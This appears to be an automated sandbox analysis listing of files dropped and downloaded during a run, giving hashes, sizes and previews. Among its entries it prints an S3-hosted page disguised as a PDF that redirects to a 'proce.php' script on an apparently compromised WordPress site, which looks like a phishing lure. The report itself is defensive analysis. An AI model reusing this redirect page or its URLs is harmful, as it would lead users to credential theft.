                                          SHA-512:DA83FB045775F61EC035F90DAF36BDEC2648ADF8FB5E99370E1A94FC725C909A137C852B35A1B938AF21C492F1880C206B37F9A243229C756C0E12738FE67BA0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):4926
                                          Entropy (8bit):3.2479120712818554
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:97E42E8F77AA57CBDF183F24AE2646C7
                                          SHA1:88AD2014120DC61983C13A4EDFAED39345C1DF82
                                          SHA-256:6B2FA31403906009310165A39A35D4556A836F0103391EC29713DF2DEA4A651F
                                          SHA-512:9888554E4D78DDA57852D517DE662DA529B6826AFD9E6881AAC29B02299232F19CB4CDEDAEE9085F6BD562E291540F71DB01C09B494822BC45DD702D3E48FFB8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):0.06873670885746685
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:63DBCD52C8ACCE5C2D321275FA8DF791
                                          SHA1:C8ECCB862A0A0FC09641C1E602223508E3590353
                                          SHA-256:68923491E84C61B84D6E0FEF8692063AFB52341C415133DBC62AC1E91DBDF43C
                                          SHA-512:3983C63022FE4F56951AFDB71A244D81F10A5880E6002826DB8ECAF5DF1EA0DD137D54109B3AACBD9D8EDE77E560E8B97E6AF67BB3AE638B00DED49D6BA025E2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):69632
                                          Entropy (8bit):0.13446299018010885
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:638D3A90BF111387AB5B10E727C1A9FF
                                          SHA1:E7BE4C5D10FC465F5C76CF36DF7A1EAA4A0581A2
                                          SHA-256:F7D0D820BBD69F8FD206E7D94273D0D73AAF72C6E2E249DE65270B9E978F77C8
                                          SHA-512:C0FA291855CBBCD7DB1F71B8190EC16A7356E2291B59D063A57C2DB09457CF30303CD9E38CC56E11566C596DD657B035859912E73DBDE87D84AEB544D67E9A0E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.5437225757381154
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:644367281CD503D49E6DA11645D067E2
                                          SHA1:00994EE923477EC1F49B0A00899454443A3486B9
                                          SHA-256:4162B7B3666C99287E3F98AE64DF5638517C2903617BAF9D460860EDE22D5BFA
                                          SHA-512:CB99B33F6E76BF019927DAF9EF817AD98AD7D14276CE283C8CA4E578E3016875FA617ADC7B9B01F8B675B33EFBFEA30E538B341BCF973716A150EF13E300DE3C
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):1.2371425407187278
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C33C4081AA596BA421202AE7A395F851
                                          SHA1:8F1BAFA07DBAA34D6EFCE7CF57523CFA0CB77B1F
                                          SHA-256:41C5A81555D32CCDA8AA58A7F86632CFE56475E1D3A95BD2FCBA1B9AC503FAA9
                                          SHA-512:34AFCAD30F7B3F10E875E1473E0EA27983BEDE3941664F3BF6A44EB1F900E4E406C804B2CDFA88B812B5B93E6149659683201A5B2DADF01D9BA5DDFD4F27DE8B
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:downloaded
                                          Size (bytes):255
                                          Entropy (8bit):5.621617474060547
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:23A5591405C1075B4E2E4D8A8333EC8B
                                          SHA1:610276C223E80E61504AD15798AB15B41E5E422A
                                          SHA-256:D77D9D6393AABE39E3FC2B3E121F985AAC63E10FF8ECDA3A0581A2B3C492E23D
                                          SHA-512:45012719EB21369A47C7FF6ECAEB5E907824EE068E26ACBAE4C68441502987173A2F108A3B5C91A94BD189BFA507514878DBEF91085F1003A00A0B6F0094700C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/favicon.ico
                                          Preview:<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>H1DBR3B2QCSZ566X</RequestId><HostId>A2uoJbyrOrlCBQvLvsnb8aLgupmrRgbJZLb1eg/WfI6XP15Yyw4HCZh1SfWvE75mF2TmiUnvEkY3vkbE/MqJJw==</HostId></Error>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1905
                                          Entropy (8bit):4.556006234037668
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C3947CB9869BFF06A70D3E178C92CA37
                                          SHA1:BA9312C6EEFCAA2B55C30369BE880CB4DE821C68
                                          SHA-256:85D20686AE8B52153A474303F995AB6BB6B99DA67CF2E0EAA0A5E4880FD7F56A
                                          SHA-512:6C6C1188AABA3E967E0E2FAF47BE852D578D7698054747AC05AA2B13F6ACF5C6CD78C40F641756A4303A27042B6AFD1DF1B2BB7B5D940F07F865FCC64421FB7F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta http-equiv="refresh" content="1;url=https://silvervalleyrealestategh.com/wp-content/uploads/elementor/thumbs/proce.php">.. <title>Redirecting...</title>.. <style>.. body {.. font-family: Arial, sans-serif;.. text-align: center;.. padding-top: 50px;.. background-color: #f3f3f3;.. }.. .content {.. width: 80%;.. margin: auto;.. padding: 20px;.. background-color: white;.. border-radius: 10px;.. box-shadow: 0 4px 8px rgba(0,0,0,0.1);.. }.. .spinner {.. border: 4px solid #f3f3f3; /* Light grey */.. border-top: 4px solid #3498db; /* Blue */.. border-radius: 50%;.. width: 50px;.. height: 50px;.. animation: spin 2s linear infinite;.. margin: auto;.. }.. @keyframes spin {..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 495 x 149, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):23447
                                          Entropy (8bit):7.981767348352221
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:39F969A5B32250DE81DE285985CB35BD
                                          SHA1:4B84F978D53720937C0F6F4FA6E5E003E421D8A6
                                          SHA-256:80B8D085E9CE86086B04E79CCB31232A4619EDB3C37885AFFD82CBF40C004513
                                          SHA-512:9661AE4352A4F8BEBBD30665743135B9D8ECFAA4EC528CD2D081350BFDDC7131E1E7C862C97ADB60A085BDC011F017A7A549186A336B71DBEAC7462394E1E82D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ci3.googleusercontent.com/meips/ADKq_NZi8R4m6H8EJruwBzxCqPKVPzWCU6p8FRwtcx3ScqmC0alrzNrsKe32Pl2h3WKXSwL-bd3kecKFfZJddwmVxlPRLfISpCAutfNswBHKsELm687KIoqZs9-Ogbs9nNrClyddA1vzBISt721ohcFF82CuM-_6WGxNRw=s0-d-e1-ft
                                          Preview:.PNG........IHDR.............qGr.....sBIT....|.d.....bKGD............ .IDATx..yXUU.......bA)..i.V ..Q(.....Y.(.9.&...%....&&h...S....(.&.X...C..B.Q.......s..^.A..{...=....}...Z...........i>..Q7@FFFFFF.f..[FFFFF..!.o......f.,.eddddd........if..[FFFFF..!.o......f.,.eddddd........if..[FFFFF..!.o......f.,.eddddd........if..[FFFFF..!.o......f.,.eddddd........if..[FFFFF......8.....v.s...H.y@.h.@...@...8..J._.T......#.....u...Z........{....0F.GR'.#,.Lx...<.d{.h...6..n..NK....q.^.E...;.s..;..MV^>y.+..)....9`?p..}x%...oYFFFF..!.o-...]..z h.....(......./u...6.;..93.......[......(.....K(--.@G.%.z.0l.....q;tZ......s.._...W29...|.5G...B......<..JT..Cu......i8.....Z...`..I.....v..g.k....{....),*....\......u...|..w.F....a....,:..93l.:..%.........8.........<..Tl;.p ..7-.p....G.?Rx.Q`...............1..._y.....:.=..q.|....u..Rl.w._o+\..d./...G...#........ ...?..@\]......L..,.w=...2...A....k.)^..:...e|y.;.......<P..k.....E.ujd..b.s/<.:0zH..Z.%.$[.O....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10001)
                                          Category:downloaded
                                          Size (bytes):67415
                                          Entropy (8bit):5.508375134858067
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9BD4F7CB380C2D64BD70138238114F7A
                                          SHA1:0DCD746FD3B50AE9BD8E215855091354759E7158
                                          SHA-256:F3AD41A7D8D3FC1D4CDC80D1374A725D8F40CDC32DBA2F03584CE190E6FEE0CF
                                          SHA-512:9FFC044B4B6C7765BA963028BA27A5AF8670F99EA52EDB782227F68BF74E995EE80A820F9D47C8121F84E33A3EC6237DDC983895C895BAF55E79B8C101B38288
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://electroagrotech.com.ua/themes/custom/ssa_core/favicon.ico
                                          Preview:<!DOCTYPE html>.<html lang="uk">.<head>..<meta charset="UTF-8">..<link rel="profile" href="https://gmpg.org/xfn/11">..<link rel="pingback" href="https://electroagrotech.com.ua/xmlrpc.php">...<title>........ .. ........ &#8211; electroagrotech</title>.<meta name='robots' content='max-image-preview:large' />.<link rel='dns-prefetch' href='//fonts.googleapis.com' />.<link rel="alternate" type="application/rss+xml" title="electroagrotech &raquo; ......." href="https://electroagrotech.com.ua/feed/" />.<link rel="alternate" type="application/rss+xml" title="electroagrotech &raquo; ..... .........." href="https://electroagrotech.com.ua/comments/feed/" />.<link rel='stylesheet' id='twb-open-sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C500%2C600%2C700%2C800&#038;display=swap&#038;ver=6.5.4' type='text/css' media='all' />.<link rel='stylesheet' id='twbbwg-global-css' href='https://electroagrotech.com.ua/wp-content/plugins
                                          No static file info